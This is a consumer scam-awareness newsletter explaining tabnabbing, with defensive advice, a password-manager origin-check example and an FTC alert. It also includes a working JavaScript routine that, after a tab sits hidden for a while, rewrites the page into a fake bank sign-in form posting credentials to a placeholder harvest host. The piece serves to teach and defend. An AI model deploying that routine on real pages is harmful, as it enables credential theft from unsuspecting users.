Tabnab Scammers Hijack Web Browsers

What is tabnabbing and how can you spot it?: Internet Scambusters #822

Tabs that allow you to keep multiple pages open in your web browser are the target for a sneaky phishing scam called tabnabbing.

By secretly changing the content of inactive pages, hackers can trick you into giving away confidential information about yourself.

In this week’s issue, we explain how tabnabbing works and what you can do to beat the tricksters…

Tabnab Scammers Hijack Web Browsers

Are you at risk of being tabnabbed?

It’s a sneaky trick hackers and scammers use to alter a page that you have open in a browser tab but are not currently looking at. Either the page itself, which the crook controls, waits until you switch away and then rewrites its own contents, or, in a variant known as reverse tabnabbing, a page you opened from a link in another tab redirects the original tab to a page of the crook’s choosing. Either way, the tab you come back to is not the page you left. (Modern browsers now block most of the second variant by default, so the self-rewriting page is the one to watch for.)

Here’s the deal:

When most of us use an Internet browser, be it Chrome, Firefox, Internet Explorer, Edge or Safari, we often open multiple pages and keep them open so we can move back and forth between pages.

We do this by clicking on the tabs for each page, which are helpfully inserted by the browser.

Now, think back to what happens if you open a bank web page or some other site where you store confidential information, like sign-on details.

Oftentimes, these secure sites will log you out if the page is inactive for a certain amount of time. Then, when you revisit it, the page tells you that you’ve been signed out and asks you to sign in again.

A tabnabber can’t touch your bank’s real page. What the crook does instead is plant a page of their own in one of your tabs, typically one you landed on from a link or an advert and then forgot about. That page waits until its tab has been inactive for a while and then rewrites its own title, icon and contents into a replica of the bank’s “you’ve been signed out” page. When you come back and sign on again, you inadvertently send your sign-on details, and maybe other confidential information, to the crook’s server instead of the bank.

That’s tabnabbing. It’s a clever phishing trick, first described in 2010, and it exploits ordinary web-page scripting: a page can tell when its tab is no longer in front, and it can change its own title, icon and contents at any time without the address in the address bar changing.

In some cases, the crook’s page doesn’t wait for you to be logged out of anything. While it sits inactive it changes completely into a sign-on page for a site they know or suspect you visit from time to time. A tab that held what looked like an ordinary reference article could, say, turn into a fake but genuine-looking Citibank sign-on page.

They’re hoping that the user will be sufficiently inattentive to think they must have previously opened the Citibank page, so they sign on, giving away access to their account.

The scam was originally demonstrated by spoofing the sign-on page of Google’s Gmail service but, according to security researchers, it can be used to fake just about any site. It also changes the “favicon” for the page, the tiny icon that appears next to the page title in the tab, so the tab itself looks like the one you expect.
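To make the mechanism concrete, here is an added example (not code from the Scambusters newsletter) of the self-rewriting page at the heart of classic tabnabbing, reduced to its decision logic. It runs against a small hand-built stand-in for the browser’s document object so it executes under Node without a real browser; the bank name, the phishing domain and the timings are all made up for the example.

```javascript
// Added example (not from the Scambusters newsletter): the self-rewriting
// page behind classic tabnabbing, reduced to its decision logic and run
// against a hand-built stand-in for the browser's document object.

// Minimal stand-in for the parts of `document` the trick touches.
// Constructed for this example; a real attack page uses the live DOM.
function makeFakeDocument() {
  return {
    hidden: false,                         // document.hidden
    title: 'Cute Cat Pictures',
    favicon: '/cat.ico',                   // href of <link rel="icon">
    body: '<h1>Cat of the day</h1>',
    listeners: {},
    addEventListener(name, fn) {
      (this.listeners[name] = this.listeners[name] || []).push(fn);
    },
    dispatch(name) {
      (this.listeners[name] || []).forEach(function (fn) { fn(); });
    },
  };
}

// The decoy the page turns into. Hypothetical bank name and domain.
const DECOY = {
  title: 'Sign in - Example Bank',
  favicon: 'https://phish.example/bank.ico',
  body: '<p>You have been signed out due to inactivity.</p>' +
        '<form method="POST" action="https://phish.example/harvest">' +
        '<input name="user"><input name="pass" type="password">' +
        '<button>Sign in</button></form>',
};

// Watches for the tab going into the background and, once it has been hidden
// long enough for the victim to lose track of it, swaps title, icon and body.
// `clock` is injected so timing can be driven deterministically; a real page
// would use Date.now and a setTimeout/setInterval that calls tick().
function installTabnabber(doc, options) {
  const opts = options || {};
  const minHiddenMs = opts.minHiddenMs === undefined ? 5000 : opts.minHiddenMs;
  const clock = opts.clock || Date.now;
  const original = { title: doc.title, favicon: doc.favicon, body: doc.body };
  let hiddenSince = null;
  let swapped = false;

  function render(page) {
    doc.title = page.title;
    doc.favicon = page.favicon;
    doc.body = page.body;
  }

  // Page Visibility API: fires when the tab is hidden or shown again.
  // A quick return resets the timer, so the swap only happens on long absences.
  doc.addEventListener('visibilitychange', function () {
    hiddenSince = doc.hidden ? clock() : null;
  });

  return {
    tick() {
      if (!swapped && hiddenSince !== null && clock() - hiddenSince >= minHiddenMs) {
        render(DECOY);
        swapped = true;
      }
      return swapped;
    },
    // Some variants put the real page back after harvesting to hide the trick.
    restore() { render(original); swapped = false; },
    isSwapped() { return swapped; },
  };
}

// Scripted scenario: the victim switches away and comes back after 2 s (no
// swap), then leaves again for 30 s (the swap happens in the background).
function runScenario() {
  let now = 0;
  const doc = makeFakeDocument();
  const nab = installTabnabber(doc, { minHiddenMs: 5000, clock: () => now });

  doc.hidden = true;  doc.dispatch('visibilitychange');
  now = 2000;         nab.tick();
  doc.hidden = false; doc.dispatch('visibilitychange');
  const afterQuickReturn = { title: doc.title, swapped: nab.isSwapped() };

  doc.hidden = true;  doc.dispatch('visibilitychange');
  now = 32000;        nab.tick();
  const afterLongAbsence = {
    title: doc.title,
    favicon: doc.favicon,
    postsTo: (doc.body.match(/action="([^"]+)"/) || [])[1],
    swapped: nab.isSwapped(),
  };
  return { afterQuickReturn, afterLongAbsence };
}
```

Note what the stand-in does not have: an address bar. Nothing in the script touches the tab’s URL, because a page cannot change it without navigating away, and that is exactly why the domain shown in the address bar is the one thing the trick cannot forge.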

And once the crook has your sign-on details, they can visit your account wherever that might be (even if it’s a non-financial site) and find other information about you that’s useful for identity theft, such as the answers to security questions, home address, Social Security numbers and date of birth.

The trouble is — and this is what makes tabnabbing particularly effective — that we tend to trust our browsers and those handy tabs, switching from one to the other without thinking and often not taking the time to check on security.

For example, how often do you check the address bar of the page you’re about to sign in to? The padlock and the “https” prefix only tell you the connection is encrypted; a phishing page can have both. What a tabnabber cannot forge is the domain name in the address bar, so read that, right up to the first slash, and make sure it is the site you think it is.

3 Actions

There are three things you can do to greatly reduce the risk of being a tabnab victim.

First, get into the habit of closing tabs when you’ve finished with a particular website. If you have to reopen it, at least you’ll be keying in the correct address from the outset.

Second, if you do leave your tabs open, be alert to what each one should contain. If a tab shows a page different from the one you expect, close it.

Third, just to be doubly sure, if you revisit a tabbed page that says you’ve been signed out and invites you to sign in again, close the tab and start over.

Some browsers offer extensions (mini add-on programs) that claim to be able to stop tabnabbers, and some advice says that disabling JavaScript (the programming language that runs inside web pages) will make you secure, although that also breaks many ordinary websites.

However, other security experts suggest these measures may not be totally effective and that hackers have found ways around them.

Another safeguard: if you use a password manager that automatically inserts your sign-on details, it checks that the web address (the domain) of the page matches the one where you originally saved them, and it ignores what the page looks like. If the address doesn’t match, it simply won’t enter the information, a clear red flag signaling trouble ahead.
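The following is an added example (not code from the newsletter or from any real password manager) of the origin check described above, applied to the kinds of lookalike addresses a tabnabbed or phished tab might show. It also serves the earlier point about reading the address bar: the host names below are all hypothetical, and the vault is constructed for the example.

```javascript
// Added example (not from the newsletter): the origin check a password
// manager performs before auto-filling, shown against lookalike addresses.
// All domains and credentials are hypothetical.

// A saved vault, constructed for this example. Managers key entries by the
// origin (scheme + host + port) where the credential was first saved.
const VAULT = [
  { origin: 'https://online.examplebank.com', username: 'alice' },
  { origin: 'https://mail.example.org', username: 'alice@example.org' },
];

// Returns the origin of a page URL, or null when the URL is unparseable or
// not served over HTTPS. `new URL()` lower-cases the host, drops default
// ports and converts Unicode host names to punycode, so a homograph domain
// never compares equal to the ASCII original.
function fillableOrigin(urlString) {
  let url;
  try {
    url = new URL(urlString);
  } catch (e) {
    return null;                    // about:blank, garbage, etc.
  }
  if (url.protocol !== 'https:') return null;   // refuse plain http and data:
  return url.origin;
}

// Picks the vault entry whose origin exactly matches the current page.
// Exact origin match is the strict policy; many managers relax it to the
// registrable domain, which this example deliberately does not do.
function matchingEntry(vault, currentUrl) {
  const current = fillableOrigin(currentUrl);
  if (current === null) return null;
  for (const entry of vault) {
    if (fillableOrigin(entry.origin) === current) return entry;
  }
  return null;
}

// The check a person can do by eye: which host is the address bar showing?
// Read it from the right: the part just before the first slash is what counts.
function hostOf(urlString) {
  const origin = fillableOrigin(urlString);
  return origin === null ? null : new URL(origin).hostname;
}

// Addresses a tabnabbed or phished tab might show, constructed for the example.
const CANDIDATES = [
  'https://online.examplebank.com/login?expired=1',             // genuine
  'http://online.examplebank.com/login',                        // downgraded
  'https://online.examplebank.com.login-verify.example/login',  // suffix trick
  'https://online-examplebank.com/login',                       // lookalike
  'https://online.examplebank.com:8443/login',                  // odd port
  'https://online.ex\u0430mplebank.com/login',                  // Cyrillic 'a' homograph
  'data:text/html,<form>...</form>',                            // injected page
];

// Decide, for each candidate address, whether anything would be auto-filled.
function decide(urls) {
  return urls.map(u => {
    const entry = matchingEntry(VAULT, u);
    return { url: u, host: hostOf(u), fill: entry ? entry.username : null };
  });
}
```

Only the first candidate gets a username; every other one, including the https lookalikes, is left empty. That silence from the manager is the red flag the newsletter describes, and it fires regardless of how convincing the page looks.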

Tabnabbing is not new. It’s been with us for many years. But the fact that it is still around and in widespread use indicates how effective it is. Beware!

Alert of the Week

Have you lost money to a business-coaching scheme involving a company called MOBE, whose operations were suspended as a result of action by the U.S. Federal Trade Commission (FTC)?

If so, the Commission says it’s hoping to secure refunds in the coming months. But the case against MOBE, and the FTC’s investigations, are not yet complete.

Learn more about the alleged scam and your entitlement to a refund here: What you need to know if you were a MOBE customer.

Time to close today, but we’ll be back next week with another issue. See you then!